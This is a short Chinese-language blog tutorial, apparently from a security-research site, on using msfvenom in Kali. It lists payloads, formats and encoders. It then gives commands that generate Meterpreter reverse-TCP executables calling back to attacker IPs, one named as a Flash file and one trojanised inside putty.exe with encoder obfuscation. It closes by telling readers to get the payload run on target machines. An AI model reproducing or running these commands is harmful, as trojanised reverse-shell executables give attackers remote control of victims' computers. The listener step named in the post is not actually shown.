• 欢迎访问挑战自我博客网站,安全研究,web渗透,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入挑战自我博客网站 网站主页

1、查找本机可用的payloads

查找64位windows平台中TCP协议的payload
msfvenom -l payloads| grep windows | grep x64 | grep tcp

查找64位bsd平台中TCP协议的payload
msfvenom -l payloads| grep bsd | grep x64 | grep tcp

2、查看支持的文件格式

msfvenom -l formats

3、查看支持的编码方式

msfvenom -l encoders

4、生产payload

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.80.142 lport=443 -f exe > flash_win7.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -a x86 –platform windows -e x86/shikata_ga_nai -i 3 -x /root/putty.exe -k -f exe -o /root/putty_evil.exe

5、本地开始监听

Kali中利用msfvenom开展攻击

然后,把我们生成的payload通过各种办法到目标机器上去运行